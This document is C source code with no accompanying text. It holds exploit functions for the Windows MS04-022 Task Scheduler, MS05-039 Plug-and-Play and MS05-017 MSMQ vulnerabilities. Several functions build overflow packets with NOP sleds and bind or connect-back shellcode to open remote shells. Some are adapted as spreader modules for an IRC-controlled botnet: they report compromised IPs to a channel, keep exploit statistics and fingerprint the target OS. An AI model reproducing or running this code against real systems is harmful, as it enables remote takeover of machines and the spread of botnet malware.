int main(int argc, char **argv) { unsigned short strlen; unsigned short port; unsigned long ip, sc; FILE *fp, *fp2; printf("\n(MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit\n\n"); printf("--- Coded by .::[ houseofdabus ]::. ---\n\n"); if (argc < 4) usage(argv[0]); sc = atoi(argv[2]); if ( ((sc == 2) && (argc < 5)) || (sc > 2)) usage(argv[0]); fp = fopen(argv[1], "wb"); if (fp == NULL) { printf("[-] error: can\'t create file: %s\n", argv[1]); exit(0); } /* header & garbage */ fwrite(jobfile, 1, sizeof(jobfile)-1, fp); fseek(fp, 39*16, SEEK_SET); port = atoi(argv[3]); printf("[*] Shellcode: "); if (sc == 1) { SET_PORTBIND_PORT(portbindsc, htons(port)); printf("Portbind, port = %u\n", port); fwrite(portbindsc, 1, sizeof(portbindsc)-1, fp); fwrite(endofjob, 1, 4, fp); fseek(fp, 70, SEEK_SET); /* calculate length (see header) */ strlen = (sizeof(jobfile)-1-71+sizeof(portbindsc)-1+4)/2; } else { ip = inet_addr(argv[4]); SET_CONNECTBACK_IP(connectbacksc, ip); SET_CONNECTBACK_PORT(connectbacksc, htons(port)); printf("Connectback, port = %u, IP = %s\n", port, argv[4]); fwrite(connectbacksc, 1, sizeof(connectbacksc)-1, fp); fwrite(endofjob, 1, 4, fp); fseek(fp, 70, SEEK_SET); /* calculate length (see header) */ strlen = (sizeof(jobfile)-1-71+sizeof(connectbacksc)-1+4)/2; } printf("[*] Generate file: %s\n", argv[1]); fwrite(&strlen, 1, 2, fp); fclose(fp); return 0; }
BOOL pnp(EXINFO exinfo) { struct sockaddr_in addr; struct hostent *he; int len; int sockfd; unsigned short smblen; unsigned short bindport; unsigned char tmp[1024]; unsigned char packet[4096]; unsigned char *ptr; char recvbuf[4096]; char buffer[IRCLINE]; #ifdef _WIN32 WSADATA wsa; WSAStartup(MAKEWORD(2,0), &wsa); #endif // printf("\n (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n"); // printf("\t Universal Exploit + no crash shellcode\n\n\n"); // printf("\t Copyright (c) 2005 .: houseofdabus :.\n\n\n"); // if (exinfo.ip < 3) { // printf("%s <host> <bind port>\n", argv[0]); // exit(0); // return false; // } if ((he = gethostbyname(exinfo.ip)) == NULL) { // printf("[-] Unable to resolve %s\n", argv[1]); // exit(0); return false; } if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) { // printf("[-] socket failed\n"); // exit(0); } addr.sin_family = AF_INET; addr.sin_port = htons(445); addr.sin_addr = *((struct in_addr *)he->h_addr); memset(&(addr.sin_zero), '\0', 8); //printf("\n[*] connecting to %s:445...", argv[1]); if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) { //printf("\n[-] connect failed\n"); //exit(0); return false; } // printf("ok\n"); // printf("[*] null session..."); if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) { // printf("\n[-] send failed\n"); // exit(0); return false; } len = recv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { // printf("\n[-] failed\n"); // exit(0); return false; } if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) { // printf("\n[-] send failed\n"); // exit(0); return false; } len = recv(sockfd, recvbuf, 4096, 0); if (len <= 10) { // printf("\n[-] failed\n"); // exit(0); return false; } if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) { // printf("\n[-] send failed\n"); // exit(0); return false; } len = recv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { //printf("\n[-] failed\n"); // exit(0); return false; } ptr = packet; memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1); ptr += sizeof(SMB_TreeConnectAndX)-1; sprintf((char*)tmp,"\\\\%s\\IPC$",exinfo.ip); convert_name((char*)ptr, (char*)tmp); smblen = strlen((char*)tmp)*2; ptr += smblen; smblen += 9; memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1); memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1); ptr += sizeof(SMB_TreeConnectAndX_)-1; smblen = ptr-packet; smblen -= 4; memcpy(packet+3, &smblen, 1); if (send(sockfd, (char*)packet, ptr-packet, 0) < 0) { // printf("\n[-] send failed\n"); // _snprintf(buffer, sizeof(buffer), "send failed"); // irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); return false; } len = recv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { // printf("\n[-] failed\n"); //_snprintf(buffer, sizeof(buffer), "failed"); // irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); // exit(0); return false; } //printf("ok\n"); // printf("[*] bind pipe..."); // _snprintf(buffer, sizeof(buffer), "Bind Pipe"); //irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) { //printf("\n[-] send failed\n"); return false; } len = recv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { // printf("\n[-] failed\n"); // exit(0); } if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) { // printf("\n[-] send failed\n"); //_snprintf(buffer, sizeof(buffer), "send failed"); //irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); //exit(0); return false; } len = recv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { // printf("\n[-] failed\n"); // exit(0); return false; } //printf("ok\n"); // printf("[*] sending crafted packet..."); // _snprintf(buffer, sizeof(buffer), "sending craffted packet"); // irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); // nop ptr = packet; memset(packet, '\x90', sizeof(packet)); // header & offsets memcpy(ptr, RPC_call, sizeof(RPC_call)-1); ptr += sizeof(RPC_call)-1; // shellcode bindport = xport; bindport ^= 0x0437; SET_PORTBIND_PORT(bind_shellcode, htons(bindport)); memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1); // end of packet memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2, RPC_call_end, sizeof(RPC_call_end)-1); // sending... if (send(sockfd, (char*)packet, 2196, 0) < 0) { // printf("\n[-] send failed\n"); //_snprintf(buffer, sizeof(buffer), "send failed"); //irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); //exit(0); return false; } // printf("ok\n"); // printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2])); // _snprintf(buffer, sizeof(buffer), "Exploiting IP:%s",exinfo.ip); irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); // recv(sockfd, recvbuf, 4096, 0); exploit[exinfo.exploit].stats++; if (ConnectShell2(exinfo)) return true; return false; }
int main (int argc, char **argv) { struct sockaddr_in addr; struct hostent *he; int len; int sockfd; unsigned short smblen; unsigned short bindport; unsigned char tmp[1024]; unsigned char packet[4096]; unsigned char *ptr; char recvbuf[4096]; #ifdef _WIN32 WSADATA wsa; WSAStartup(MAKEWORD(2,0), &wsa); #endif printf("\n (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n"); printf("\t Universal Exploit + no crash shellcode\n\n"); printf("\t [Spanish hack by RoMaNSoFt :-)]\n\n\n"); printf("\t Copyright (c) 2005 .: houseofdabus :.\n\n\n"); if (argc < 3) { printf("%s <host> <bind port>\n", argv[0]); exit(0); } if ((he = gethostbyname(argv[1])) == NULL) { printf("[-] Unable to resolve %s\n", argv[1]); exit(0); } if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) { printf("[-] socket failed\n"); exit(0); } addr.sin_family = AF_INET; addr.sin_port = htons(445); addr.sin_addr = *((struct in_addr *)he->h_addr); memset(&(addr.sin_zero), '\0', 8); printf("\n[*] connecting to %s:445...", argv[1]); if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) { printf("\n[-] connect failed\n"); exit(0); } printf("ok\n"); printf("[*] null session..."); if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) { printf("\n[-] send failed\n"); exit(0); } len = recv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { printf("\n[-] failed\n"); exit(0); } if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) { printf("\n[-] send failed\n"); exit(0); } len = recv(sockfd, recvbuf, 4096, 0); if (len <= 10) { printf("\n[-] failed\n"); exit(0); } if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) { printf("\n[-] send failed\n"); exit(0); } len = recv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { printf("\n[-] failed\n"); exit(0); } ptr = packet; memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1); ptr += sizeof(SMB_TreeConnectAndX)-1; sprintf(tmp, "\\\\%s\\IPC$", argv[1]); convert_name(ptr, tmp); smblen = strlen(tmp)*2; ptr += smblen; smblen += 9; memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1); memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1); ptr += sizeof(SMB_TreeConnectAndX_)-1; smblen = ptr-packet; smblen -= 4; memcpy(packet+3, &smblen, 1); if (send(sockfd, packet, ptr-packet, 0) < 0) { printf("\n[-] send failed\n"); exit(0); } len = recv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { printf("\n[-] failed\n"); exit(0); } printf("ok\n"); printf("[*] bind pipe..."); if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) { printf("\n[-] send failed\n"); exit(0); } len = recv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { printf("\n[-] failed\n"); exit(0); } if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) { printf("\n[-] send failed\n"); exit(0); } len = recv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { printf("\n[-] failed\n"); exit(0); } printf("ok\n"); printf("[*] sending crafted packet..."); // nop ptr = packet; memset(packet, '\x90', sizeof(packet)); // header & offsets memcpy(ptr, RPC_call, sizeof(RPC_call)-1); ptr += sizeof(RPC_call)-1; // shellcode bindport = (unsigned short)atoi(argv[2]); bindport ^= 0x0437; SET_PORTBIND_PORT(bind_shellcode, htons(bindport)); memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1); // end of packet memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2, RPC_call_end, sizeof(RPC_call_end)-1); // sending... if (send(sockfd, packet, 2196, 0) < 0) { printf("\n[-] send failed\n"); exit(0); } printf("ok\n"); printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2])); recv(sockfd, recvbuf, 4096, 0); return 0; }
int main (int argc, char **argv) { unsigned char endp[] = "fdb3a030-065f-11d1-bb9b-00a024ea5525"; unsigned char *packet = NULL; unsigned short bindport; unsigned long cnt; struct sockaddr_in addr; struct hostent *he; int len, cpkt = 1; int sockfd; char recvbuf[4096]; char *buff, *ptr; #ifdef _WIN32 WSADATA wsa; #endif printf("\n (MS05-017) Message Queuing Buffer Overflow Vulnerability\n\n"); printf("\t Copyright (c) 2004-2005 .: houseofdabus :.\n\n\n"); if (argc < 5) { printf("%s <host> <port> <netbios name> <bind port> [count]\n", argv[0]); printf("\nMSMQ ports: 2103, 2105, 2107\n"); printf("count - number of packets. for Win2k Server/AdvServer = 6-8\n\n"); exit(0); } #ifdef _WIN32 WSAStartup(MAKEWORD(2,0), &wsa); #endif if ((he = gethostbyname(argv[1])) == NULL) { printf("[-] Unable to resolve %s\n", argv[1]); return 0; } if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) { printf("[-] create socket failed\n"); exit(0); } addr.sin_family = AF_INET; addr.sin_port = htons((short)atoi(argv[2])); addr.sin_addr = *((struct in_addr *)he->h_addr); memset(&(addr.sin_zero), '\0', 8); printf("\n[*] Connecting to %s:%u ... ", argv[1], atoi(argv[2])); if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) { printf("\n[-] connect failed!\n"); exit(0); } printf("OK\n"); packet = dce_rpc_bind(0, endp, 1, &cnt); if (send(sockfd, packet, cnt, 0) == -1) { printf("[-] send failed\n"); exit(0); } len = recv(sockfd, recvbuf, 4096, 0); if (len <= 0) { printf("[-] recv failed\n"); exit(0); } free(packet); printf("[*] Attacking..."); buff = (char *) malloc(4172); memset(buff, NOP, 4172); ptr = buff; memcpy(ptr, dce_rpc_header1, sizeof(dce_rpc_header1)-1); ptr += sizeof(dce_rpc_header1)-1; // Remote NetBIOS name convert_name(ptr, argv[3]); ptr += strlen(argv[3])*2; memcpy(ptr, tag_private, sizeof(tag_private)-1); ptr += sizeof(tag_private)-1; memcpy(buff+1048, dce_rpc_header2, sizeof(dce_rpc_header2)-1); memcpy(buff+1048*2, dce_rpc_header2, sizeof(dce_rpc_header2)-1); memcpy(buff+1048*3, dce_rpc_header3, sizeof(dce_rpc_header3)-1); // offsets ptr = buff; ptr += 438; memcpy(ptr, offsets, sizeof(offsets)-1); ptr += sizeof(offsets)-1; // shellcode bindport = (unsigned short)atoi(argv[4]); bindport ^= 0x0437; SET_PORTBIND_PORT(bind_shellcode, htons(bindport)); memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1); buff[4170] = '\0'; buff[4171] = '\0'; if (argc == 6) cpkt = atoi(argv[5]); while (cpkt--) { printf("."); if (send(sockfd, buff, 4172, 0) == -1) { printf("\n[-] send failed\n"); exit(0); } } printf(" OK\n"); return 0; }
BOOL ppexploit (EXINFO exinfo) //main (int argc, char **argv) { int len; char buffer[IRCLINE]; SOCKET sockfd; int pport = 7777; BOOL success = FALSE; SOCKADDR_IN their_addr; memset(&their_addr, 0, sizeof(their_addr)); //struct sockaddr_in addr; char recvbuf[4096]; // struct hostent *he; unsigned short smblen; unsigned short bindport; char tmp[1024]; char packet[4096]; char *ptr; /* WSADATA wsa; WSAStartup(MAKEWORD(2,0), &wsa);*/ //printf("\n (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n"); //printf("\t Universal Exploit + no crash shellcode\n\n\n"); //printf("\t Copyright (c) 2005 .: houseofdabus :.\n\n\n"); /* if (argc < 3) { printf("%s <host> <bind port>\n", argv[0]); exit(0); } */ /* if ((he = gethostbyname(argv[1])) == NULL) { printf("[-] Unable to resolve %s\n", argv[1]); exit(0); } */ if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) < 0) { return FALSE; } their_addr.sin_family = AF_INET; their_addr.sin_addr.s_addr = finet_addr(exinfo.ip); their_addr.sin_port = fhtons((unsigned short)exinfo.port); /*addr.sin_family = AF_INET; addr.sin_port = fhtons((unsigned short)exinfo.port); addr.sin_addr.s_addr = finet_addr(exinfo.ip);*/ memset(&(their_addr.sin_zero), '\0', 8); //printf("\n[*] connecting to %s:445...", argv[1]); if (fconnect(sockfd, (LPSOCKADDR)&their_addr, sizeof(struct sockaddr)) < 0) { return FALSE; } //printf("ok\n"); //printf("[*] null session..."); if (fsend(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) { return FALSE; } len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { return FALSE; } if (fsend(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) { return FALSE; } len = frecv(sockfd, recvbuf, 4096, 0); if (len <= 10) { return FALSE; } if (fsend(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) { return FALSE; } len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { return FALSE; } ptr = packet; memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1); ptr += sizeof(SMB_TreeConnectAndX)-1; sprintf(tmp, "\\\\%s\\IPC$", exinfo.ip); convert_name(ptr, tmp); smblen = strlen(tmp)*2; ptr += smblen; smblen += 9; memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1); memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1); ptr += sizeof(SMB_TreeConnectAndX_)-1; smblen = ptr-packet; smblen -= 4; memcpy(packet+3, &smblen, 1); if (fsend(sockfd, packet, ptr-packet, 0) < 0) { return FALSE; } len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { return FALSE; } //printf("ok\n"); //printf("[*] bind pipe..."); if (fsend(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) { return FALSE; } len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { return FALSE; } if (fsend(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) { return FALSE; } len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { return FALSE; } //printf("ok\n"); //printf("[*] sending crafted packet..."); // nop ptr = packet; memset(packet, '\x90', sizeof(packet)); // header & offsets memcpy(ptr, RPC_call, sizeof(RPC_call)-1); ptr += sizeof(RPC_call)-1; // shellcode bindport = (unsigned short)atoi((const char *)pport); bindport ^= 0x0437; SET_PORTBIND_PORT(bind_shellcode, htons(bindport)); memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1); // end of packet memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2, RPC_call_end, sizeof(RPC_call_end)-1); // sending... if (fsend(sockfd, packet, 2196, 0) < 0) { return FALSE; } // printf("ok\n"); // printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2])); frecv(sockfd, recvbuf, 4096, 0); Sleep(300); fclosesocket(sockfd); if (ConnectShell2(exinfo)) { if(!exinfo.silent) { _snprintf(buffer, sizeof(buffer), "[FTP]: Transfer info sent to IP: %s.", exinfo.ip); irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); addlog(buffer); } exploit[exinfo.exploit].stats++; return TRUE; } return FALSE; }
BOOL MSMQ(EXINFO exinfo) { if(!fNetWkstaGetInfo) { return FALSE; } char* cname; char endp[] = "fdb3a030-065f-11d1-bb9b-00a024ea5525"; char *packet = NULL; unsigned short bindport; unsigned long cnt; struct sockaddr_in addr; int len, cpkt = 1; int sockfd; char recvbuf[4096]; char *buff, *ptr; if ((sockfd = fsocket(AF_INET, SOCK_STREAM, 0)) < 0) return FALSE; addr.sin_family = AF_INET; addr.sin_port = fhtons(exinfo.port); addr.sin_addr.s_addr = finet_addr(exinfo.ip); memset(&(addr.sin_zero), '\0', 8); if (fconnect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) return FALSE; packet = dce_rpc_bind(0, endp, 1, &cnt); if (fsend(sockfd, packet, cnt, 0) == -1) { free(packet); return FALSE; } len = recv(sockfd, recvbuf, 4096, 0); if (len <= 0) { free(packet); return FALSE; } cname = GetRemoteComputerName(exinfo.ip); if(strlen(cname) == 0) { return FALSE; } buff = (char *) malloc(4172); memset(buff, NOP, 4172); ptr = buff; memcpy(ptr, dce_rpc_header1, sizeof(dce_rpc_header1)-1); ptr += sizeof(dce_rpc_header1)-1; msmq_convert_name(ptr, cname); ptr += strlen(cname)*2; memcpy(ptr, tag_private, sizeof(tag_private)-1); ptr += sizeof(tag_private)-1; memcpy(buff+1048, dce_rpc_header2, sizeof(dce_rpc_header2)-1); memcpy(buff+1048*2, dce_rpc_header2, sizeof(dce_rpc_header2)-1); memcpy(buff+1048*3, dce_rpc_header3, sizeof(dce_rpc_header3)-1); ptr = buff; ptr += 438; memcpy(ptr, offsets, sizeof(offsets)-1); ptr += sizeof(offsets)-1; int bp = brandom(1337,65535); bindport = (unsigned short)bp; bindport ^= 0x0437; SET_PORTBIND_PORT(bind_shellcode, fhtons(bindport)); memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1); buff[4170] = '\0'; buff[4171] = '\0'; int TargetOS = FpHost(exinfo.ip, FP_RPC); if(TargetOS == OS_WIN2K) cpkt = 8; if(TargetOS == OS_WINXP) cpkt = 1; while (cpkt--) { if (fsend(sockfd, buff, 4172, 0) == -1) { return FALSE; } } fclosesocket(sockfd); Sleep(500); free(buff); if(ConnectShellEx(exinfo, bp) == true) { exploit[exinfo.exploit].stats++; return TRUE;} return FALSE; }